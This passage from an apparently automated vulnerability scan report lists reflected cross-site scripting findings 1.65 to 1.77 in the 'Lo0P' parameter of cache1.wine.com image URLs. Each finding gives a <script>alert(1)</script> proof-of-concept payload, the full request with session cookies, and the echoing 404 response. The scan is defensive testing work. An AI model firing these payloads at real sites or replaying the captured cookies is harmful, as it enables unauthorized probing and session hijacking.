<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/bgkSignUpBorder.gif?Lo0P=67148<script>alert(1)</script>a87fab69ea6 was not found on this server.<P>
...[SNIP]...

1.65. http://cache1.wine.com/images/homepage/btnSignUp.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/btnSignUp.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c16d4<script>alert(1)</script>6e3a014bc6a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/btnSignUp.gif?Lo0P=c16d4<script>alert(1)</script>6e3a014bc6a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/btnSignUp.gif?Lo0P=c16d4<script>alert(1)</script>6e3a014bc6a was not found on this server.<P>
...[SNIP]...

1.66. http://cache1.wine.com/images/homepage/btnStartShopping.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/btnStartShopping.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9b8d8<script>alert(1)</script>da719b61f4c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/btnStartShopping.gif?Lo0P=9b8d8<script>alert(1)</script>da719b61f4c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 272
Date: Mon, 14 Feb 2011 17:16:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/btnStartShopping.gif?Lo0P=9b8d8<script>alert(1)</script>da719b61f4c was not found on this server.<P>
...[SNIP]...

1.67. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_10shipping.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_10shipping.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 60e41<script>alert(1)</script>895d278f609 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_10shipping.jpg?Lo0P=60e41<script>alert(1)</script>895d278f609 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 293
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_10shipping.jpg?Lo0P=60e41<script>alert(1)</script>895d278f609 was not found on this server.<P>
...[SNIP]...

1.68. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 84199<script>alert(1)</script>5ba932fb349 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg?Lo0P=84199<script>alert(1)</script>5ba932fb349 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 303
Date: Mon, 14 Feb 2011 17:16:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg?Lo0P=84199<script>alert(1)</script>5ba932fb349 was not found on this server.<P>
...[SNIP]...

1.69. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 142eb<script>alert(1)</script>d58320de07d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg?Lo0P=142eb<script>alert(1)</script>d58320de07d HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 301
Date: Mon, 14 Feb 2011 17:16:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg?Lo0P=142eb<script>alert(1)</script>d58320de07d was not found on this server.<P>
...[SNIP]...

1.70. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6edfe<script>alert(1)</script>4623ffcea28 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg?Lo0P=6edfe<script>alert(1)</script>4623ffcea28 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 300
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg?Lo0P=6edfe<script>alert(1)</script>4623ffcea28 was not found on this server.<P>
...[SNIP]...

1.71. http://cache1.wine.com/images/icnCloseWindow.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/icnCloseWindow.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3ba42<script>alert(1)</script>fbdde2091d8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icnCloseWindow.gif?Lo0P=3ba42<script>alert(1)</script>fbdde2091d8 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/icnCloseWindow.gif?Lo0P=3ba42<script>alert(1)</script>fbdde2091d8 was not found on this server.<P>
...[SNIP]...

1.72. http://cache1.wine.com/images/icon_email.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/icon_email.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c7e77<script>alert(1)</script>dca623c0d7 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icon_email.gif?Lo0P=c7e77<script>alert(1)</script>dca623c0d7 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Mon, 14 Feb 2011 17:16:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/icon_email.gif?Lo0P=c7e77<script>alert(1)</script>dca623c0d7 was not found on this server.<P>
...[SNIP]...

1.73. http://cache1.wine.com/images/imgCart.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/imgCart.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload dd0b1<script>alert(1)</script>9f3ec79514b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/imgCart.gif?Lo0P=dd0b1<script>alert(1)</script>9f3ec79514b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/imgCart.gif?Lo0P=dd0b1<script>alert(1)</script>9f3ec79514b was not found on this server.<P>
...[SNIP]...

1.74. http://cache1.wine.com/images/logos/wineManLine.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/logos/wineManLine.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 997d6<script>alert(1)</script>2dcb5ef0eff was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/logos/wineManLine.gif?Lo0P=997d6<script>alert(1)</script>2dcb5ef0eff HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/logos/wineManLine.gif?Lo0P=997d6<script>alert(1)</script>2dcb5ef0eff was not found on this server.<P>
...[SNIP]...

1.75. http://cache1.wine.com/images/rating96.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/rating96.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e0e4d<script>alert(1)</script>4028e97db73 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating96.gif?Lo0P=e0e4d<script>alert(1)</script>4028e97db73 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating96.gif?Lo0P=e0e4d<script>alert(1)</script>4028e97db73 was not found on this server.<P>
...[SNIP]...

1.76. http://cache1.wine.com/images/ratingPR.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingPR.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9b5ca<script>alert(1)</script>8885bdcc901 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingPR.gif?Lo0P=9b5ca<script>alert(1)</script>8885bdcc901 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingPR.gif?Lo0P=9b5ca<script>alert(1)</script>8885bdcc901 was not found on this server.<P>
...[SNIP]...

1.77. http://cache1.wine.com/images/ratingST.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingST.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c2a1f<script>alert(1)</script>8dad4a9f8d2 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

